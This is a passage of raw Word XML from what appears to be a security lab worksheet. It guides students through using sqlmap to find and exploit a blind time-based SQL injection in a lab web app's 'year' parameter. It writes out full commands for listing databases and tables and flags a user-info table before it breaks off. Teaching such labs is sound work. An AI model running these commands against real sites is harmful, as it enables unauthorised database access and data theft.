      <w:r w:rsidR="00563BD6">
        <w:t xml:space="preserve">ead through the help file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B126EEA" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="2D35BEAE" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00563BD6">
        <w:t xml:space="preserve">he command syntax is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E0F17B" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRPr="003B6ACD" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap -u "http://www.control.com:88/cdcol/</w:t>
      </w:r>
      <w:r w:rsidR="007B37AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>search_action</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.php?title=&amp;year=1991"</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9CAE1D" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6"/>
    <w:p w14:paraId="6ED04B60" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00F65BAA" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65BAA">
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">//should be a valid URL - we don't want the user being redirected to a different page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E8A599" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4325C502" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">We add the quotes because of the </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> embedded in the URL - this can cause Linux to put SQLMap into a background process. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B03C32F" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="7A63934D" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRPr="00A0449A" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted to allow redirection, enter </w:t>
      </w:r>
      <w:r w:rsidR="00A0449A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916D7C6" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="5C60A8DC" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00A0449A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted to skip other (non-MySQL) databases, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033AE946" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00A0449A"/>
    <w:p w14:paraId="0613E4BF" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00A0449A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted to skip other key values (not year), enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B1D59" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00A0449A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE1C560" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00A0449A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0449A">
        <w:lastRenderedPageBreak/>
        <w:t>When prompted to skip parameters other than year, type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325DCD91" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00A0449A"/>
    <w:p w14:paraId="53A3F769" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="545758C6" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">SQLMap identifies that the dbms is MySQL version 5.0.11 or later. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F597C5" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>and that the year field is susceptible to blind injection timing attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC335D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="19DB459D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">Using Google, find out that a </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>blind sql inje</w:t>
      </w:r>
      <w:r w:rsidR="003B6ACD" w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>tion timing attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A4ED0" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>Explain it here:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t xml:space="preserve">  (don’t hold back – it’s complicated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E2C93" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="62F53E98">
          <v:rect id="_x0000_s2110" style="position:absolute;margin-left:2.65pt;margin-top:8.45pt;width:434.4pt;height:182.6pt;z-index:5;mso-position-vertical-relative:line">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="2C1450FE" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="003B6ACD"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D80C0EB" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="0F75D616" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="36A2C4E3" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="1D680977" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="3B3FDB45" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6"/>
    <w:p w14:paraId="1BCBB305" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6"/>
    <w:p w14:paraId="709F8F32" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6"/>
    <w:p w14:paraId="34455CD6" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="64075854" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00563BD6"/>
    <w:p w14:paraId="08D47F83" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00563BD6"/>
    <w:p w14:paraId="5B2C74C4" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00563BD6"/>
    <w:p w14:paraId="53887B89" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00563BD6"/>
    <w:p w14:paraId="35F82C09" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00563BD6"/>
    <w:p w14:paraId="0CBE1304" w14:textId="77777777" w:rsidR="00A0449A" w:rsidRDefault="00A0449A" w:rsidP="00563BD6"/>
    <w:p w14:paraId="72EC2757" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="68AE18DB" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00A0449A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The summary shows that the OS is Windows, the web server is Apache and the DBMS is MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00BC3434">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FC8B42" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00A0449A" w:rsidP="00563BD6">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00563BD6">
        <w:t xml:space="preserve">n future queries we can speed things up by specifying </w:t>
      </w:r>
      <w:r w:rsidR="00563BD6" w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--dbms=MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68774CEC" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">We can also make things multi-threaded to speed it up: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--threads=9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CEF3F1" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="75714834" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>Repeat the command, setting the dbms and ask for the dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EBE310" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="15728D25" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap -u "http://www.control.com:88/cdcol/</w:t>
      </w:r>
      <w:r w:rsidR="007B37AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>search_action</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.php?title=&amp;year=1991" --dbms=MySQL --threads=9 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D7DFC" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="756F36A4"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2111" type="#_x0000_t62" style="position:absolute;margin-left:388.85pt;margin-top:10.1pt;width:123.25pt;height:31.1pt;z-index:6;mso-position-vertical-relative:line" adj="-19041,-3855">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="53B41A36" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434">
                  <w:r>
                    <w:t>all on one line</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F71991" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRPr="00A0449A" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted to allow redirection, enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9CB488" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>When prompted, accept the defaults</w:t>
      </w:r>
      <w:r w:rsidR="00A0449A">
        <w:t xml:space="preserve"> (&lt;Enter key&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C68B9D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="55E6E771" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">After a while the program will start brute-force guessing the database names. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1649B8FD" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">You will see them appear one character at a time. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A7AB5" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="46902139">
          <v:rect id="_x0000_s2112" style="position:absolute;margin-left:184.05pt;margin-top:8pt;width:259pt;height:145.75pt;z-index:7;mso-position-vertical-relative:line">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="22961720" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35523F75" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>What are the table names?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F592CD8" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="0B1A1CEF" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="03D4B4BA" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="1225E404" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="52A939E1" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="411E5111" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4318DB55" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="2BA323C5" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="2CA018E1" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="14E74130" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="06BC92ED" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00BC3434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now you can specify a particular database and search for table names. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D4254" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="13C634C9" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>You can speed it up by specifying the key-value pair to use for injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E3B333" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-p year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E7D7F" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="73016666" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap -u "http://www.control.com:88/cdcol/</w:t>
      </w:r>
      <w:r w:rsidR="007B37AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>search_action</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.php?title=&amp;year=1991" --dbms=MySQL --threads=9 -D cdcol -p year --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C23B3D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="22575410">
          <v:shape id="_x0000_s2113" type="#_x0000_t62" style="position:absolute;margin-left:364.95pt;margin-top:7pt;width:123.25pt;height:31.1pt;z-index:8;mso-position-vertical-relative:line" adj="-19041,-3855">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="2E712B8F" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434">
                  <w:r>
                    <w:t>all on one line</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11674118" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRPr="00A0449A" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When prompted to allow redirection, enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4138F675" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRDefault="00B85B20" w:rsidP="00B85B20">
      <w:r>
        <w:t>When prompted, accept the defaults (&lt;Enter key&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153BDF2" w14:textId="77777777" w:rsidR="00B85B20" w:rsidRDefault="00B85B20" w:rsidP="00563BD6"/>
    <w:p w14:paraId="44AAC5C7" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">After a while SQLMap will start to brute-force the table names. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66724D77" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4A12B6D4" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0B40A0D0">
          <v:rect id="_x0000_s2114" style="position:absolute;margin-left:188.55pt;margin-top:3.1pt;width:259pt;height:145.75pt;z-index:9;mso-position-vertical-relative:line">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="24F3AE5E" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434"/>
                <w:p w14:paraId="33751B59" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00BC3434"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00563BD6" w:rsidRPr="00BC3434">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>What are they?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFCD2BC" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="602D4977" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="44684BE6" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="70347F15" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="28FC423D" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="7085F081" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="5D68769A" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="0B9AE7F6" w14:textId="77777777" w:rsidR="00BC3434" w:rsidRDefault="00BC3434" w:rsidP="00563BD6"/>
    <w:p w14:paraId="50C17F10" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="2A347995" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00BC3434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Userinfo looks interesting. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A290AC4" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>Try</w:t>
      </w:r>
      <w:r w:rsidR="00BC3434">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538EDF89" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="2B227EE9" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00BC3434" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3434">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
